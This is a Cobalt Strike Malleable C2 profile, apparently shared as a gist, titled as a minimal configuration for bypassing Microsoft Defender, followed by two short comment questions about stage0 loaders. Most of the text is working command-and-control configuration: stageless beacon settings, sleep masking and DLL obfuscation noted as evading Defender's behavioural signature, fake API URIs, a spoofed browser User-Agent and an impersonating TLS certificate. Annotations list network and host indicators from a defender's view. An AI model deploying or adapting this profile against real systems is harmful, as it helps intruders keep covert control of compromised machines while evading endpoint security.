Minimal Cobalt Strike C2 Profile for Bypassing Defender
# Minimal Malleable C2 profile. The profile alone is not what the author relies
# on: it is paired with a custom stage0 loader (the customized Artifact Kit, per
# the gist comments), because the default generated artifacts are caught by
# signatures.
#
# Detection note (defender's view): every value in this profile is a fixed
# string, so the traffic and artifacts it produces are fingerprintable as
# written -- the User-Agent (Chrome/Edge 96), the two URIs, the
# "X-Client: notevil" header, the module name "notevil.dll" and the
# self-signed certificate subject below can each serve as a network or host
# indicator.

# No staging: the team server does not serve a stager over HTTP(S), so only
# stageless payloads are used with this profile.
set host_stage "false";

# Check-in interval in milliseconds (10 s); no jitter is set in this profile.
set sleeptime "10000";

# Fixed browser User-Agent sent with every request (a single, dated
# Chrome/Edge 96 build string).
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";

# Reflective-loading options for the Beacon DLL.
stage {
    set allocator "MapViewOfFile";
    set name "notevil.dll";
    set obfuscate "true";
    # Author's observation: without sleep_mask the first connect-back is
    # flagged by Defender as Behavior:Win32/CobaltStrike.[EH]!sms.
    set sleep_mask "true";
}

# Check-in request: session metadata is base64-encoded and carried in the
# Cookie header; the server body is returned unmodified.
http-get {
    set uri "/apiv8/getStatus";
    client {
        # Static marker header the author's nginx redirector matches on.
        header "X-Client" "notevil";
        metadata {
            base64;
            header "Cookie";
        }
    }
    server {
        output {
            print;
        }
    }
}

# Result-post request: the session id is base64url-encoded in the "key" URL
# parameter; request and response bodies are passed through unmodified.
http-post {
    set uri "/apiv8/updateConfig";
    client {
        # Same static marker header as in http-get.
        header "X-Client" "notevil";
        id {
            base64url;
            parameter "key";
        }
        output {
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}

# Subject of the self-signed listener certificate, valid 365 days. A constant
# subject like this is itself a TLS-level indicator.
https-certificate {
    set C "US";
    set CN "update.secureapp9.com";
    set O "netsecurity";
    set OU "Certificate Authority";
    set validity "365";
}
Actually, by stage0 I mean the customized Artifact Kit.
What is a stage0 loader? Is it a stageless loader?